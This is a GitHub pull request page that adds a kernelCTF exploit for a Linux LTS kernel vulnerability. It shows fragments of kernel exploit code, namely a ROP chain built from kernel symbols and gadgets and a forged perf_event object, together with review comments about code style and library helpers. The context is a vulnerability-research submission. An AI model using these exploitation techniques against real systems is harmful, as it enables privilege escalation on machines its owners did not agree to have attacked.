Add kernelCTF CVE-2026-23271_lts#379
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request.
34004d3 to d383bff
| rop.Add(g_target->GetSymbolOffset("_copy_from_user"), true); | ||
| rop.Add(g_target->GetSymbolOffset("pop_rdi_ret"), true); | ||
| rop.Add(0x10000ULL); | ||
| rop.Add(g_target->GetSymbolOffset("msleep"), true); |
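Review bot: the literal `0x10000ULL` popped into rdi right before `msleep` is an unexplained magic number; it is the millisecond argument (0x10000 ms, roughly 65 seconds), so give it a named constant or a comment stating the intended delay, and keep that when the call is switched to the `RopActionId::MSLEEP` action.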
Please check RopActionId::MSLEEP and utilise it here
| memset(fake_event, 0, PERF_EVENT_SIZE); | ||
| // Safety fields | ||
| *(uint64_t*)(fake_event + off_ctx) = 0; |
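Review bot: `*(uint64_t*)(fake_event + off_ctx) = 0;` under `// Safety fields` is redundant, because `memset(fake_event, 0, PERF_EVENT_SIZE)` already zeroed the whole buffer; either drop the assignment or reword the comment to say which field `off_ctx` addresses and why it must be NULL, so the intent survives if the memset is ever removed.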
Please have a look at PayloadBuilder and Payload. An example could be https://github.com/google/kernel-research/blob/main/libxdk/samples/exp151/exploit.cpp
| // ROP chain at event + 0x8 (right after destroy field) | ||
| RopChain rop(*g_target, ktext); | ||
| rop.Add(g_target->GetSymbolOffset("pop_rdi_ret"), true); |
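Review bot: the comment `// ROP chain at event + 0x8 (right after destroy field)` hard-codes the offset while the rest of the fake event layout uses named offsets such as `off_ctx`; express the chain's position through a named offset of the destroy field as well, so the comment and the actual write cannot drift apart.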
This is not a symbol. This is a gadget. So you should follow https://google.github.io/security-research/kernelctf/style_guide.html#rop-chains as it's impossible to utilise XDK's RopChain
b6c6c07 to fac130e
No description provided.